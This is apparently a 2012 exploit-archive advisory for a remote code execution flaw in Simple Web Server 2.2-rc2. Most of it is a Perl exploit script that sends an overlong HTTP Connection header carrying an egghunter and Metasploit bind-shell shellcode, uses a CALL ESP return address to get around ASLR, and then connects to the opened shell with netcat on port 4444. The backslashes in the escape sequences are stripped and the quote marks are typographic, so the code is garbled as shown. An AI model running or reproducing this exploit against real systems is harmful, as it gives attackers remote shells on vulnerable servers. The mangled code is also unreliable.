Simple Web Server Remote Code Execution Egghunting + ASLR Bypass Exploit

Summary

Simple Web Server is prone to remote code execution egghunting + ASLR bypass

Credit:

The information has been provided by pole.


Details

Vulnerable Systems:
 * Simple Web Server 2.2-rc2

print ‘Exploit by Dhruval n’;

if (@ARGV != 2)
{
print ‘n[-] Usage: $0 <target ip> <port> nn’;
exit();
}

$target = $ARGV[0]; # Target IP
$port = $ARGV[1]; # Target port

$egghunter =
‘x66x81xCAxFFx0Fx42x52x6Ax02’.
‘x58xCDx2Ex3Cx05x5Ax74xEFxB8’.
‘w00t’. # The 4 byte tag!
‘x8BxFAxAFx75xEAxAFx75xE7xFFxE7’;

# MSF windows/shell_bind_tcp LPORT=4444
$shellcode =
‘xdaxc5xd9x74x24xf4x2bxc9xbax3ax04xccxb6x5e’.
‘xb1x56x31x56x19x83xeexfcx03x56x15xd8xf1x30’.
‘x5ex95xfaxc8x9fxc5x73x2dxaexd7xe0x25x83xe7’.
‘x63x6bx28x8cx26x98xbbxe0xeexafx0cx4exc9x9e’.
‘x8dx7fxd5x4dx4dx1exa9x8fx82xc0x90x5fxd7x01’.
‘xd4x82x18x53x8dxc9x8bx43xbax8cx17x62x6cx9b’.
‘x28x1cx09x5cxdcx96x10x8dx4dxadx5bx35xe5xe9’.
‘x7bx44x2axeax40x0fx47xd8x33x8ex81x11xbbxa0’.
‘xedxfdx82x0cxe0xfcxc3xabx1bx8bx3fxc8xa6x8b’.
‘xfbxb2x7cx1ex1ex14xf6xb8xfaxa4xdbx5ex88xab’.
‘x90x15xd6xafx27xfax6cxcbxacxfdxa2x5dxf6xd9’.
‘x66x05xacx40x3exe3x03x7dx20x4bxfbxdbx2ax7e’.
‘xe8x5dx71x17xddx53x8axe7x49xe4xf9xd5xd6x5e’.
‘x96x55x9ex78x61x99xb5x3cxfdx64x36x3cxd7xa2’.
‘x62x6cx4fx02x0bxe7x8fxabxdexa7xdfx03xb1x07’.
‘xb0xe3x61xefxdaxebx5ex0fxe5x21xe9x08x2bx11’.
‘xb9xfex4exa5x2fxa2xc7x43x25x4ax8exdcxd2xa8’.
‘xf5xd4x45xd3xdfx48xddx43x57x87xd9x6cx68x8d’.
‘x49xc1xc0x46x1ax09xd5x77x1dx04x7dxf1x25xce’.
‘xf7x6fxe7x6fx07xbax9fx0cx9ax21x60x5bx87xfd’.
‘x37x0cx79xf4xd2xa0x20xaexc0x39xb4x89x41xe5’.
‘x05x17x4bx68x31x33x5bxb4xbax7fx0fx68xedx29’.
‘xf9xcex47x98x53x98x34x72x34x5dx77x45x42x62’.
‘x52x33xaaxd2x0bx02xd4xdaxdbx82xadx07x7cx6c’.
‘x64x8cx8cx27x25xa4x04xeexbfxf5x48x11x6ax39’.
‘x75x92x9fxc1x82x8axd5xc4xcfx0cx05xb4x40xf9’.
‘x29x6bx60x28x23’;

$junk = ‘x41’ x (2048 – length(‘w00tw00t’) – length($shellcode));
$ret = pack(‘V’,0x6FC8E251); # CALL ESP – libstdc++-6.dll Non Aslr
#$ret = pack(‘V’,0x7C82385D); #call ESP
#$ret = pack (‘V’,0x75560D1B); #call ESP ASLR AWARE 🙂
$nops = ‘x90′ x 20; # 20 nops.
$exploit = $junk.’w00tw00t’.$shellcode.$ret.$nops.$egghunter;

if ($socket = IO::Socket::INET->new
(PeerAddr => $target,
PeerPort => $port,
Proto => ‘TCP’))
{
$header =
‘GET / HTTP/1.1rn’.
‘Host: ‘.$target.’ rn’.
‘Connection:’.$exploit.’rn’;
print ‘n[+] Sending buffer (‘.(length($exploit)).’ bytes) to: $target:$port n’;
print $socket $header.’rn’;
sleep(1);
close($socket);
print ‘[+] Exploitation Done!n’;
print ‘[+] Please, wait couple of sec …n’;
sleep(1);
print ‘[+] Got shell?nn’;
$command = ‘nc $target 4444’;
system ($command);
}

else
{
print ‘[-] Connection to $target failed!n’;
}

Disclosure Timeline:
Published: 2012-08-28

Categories: Exploits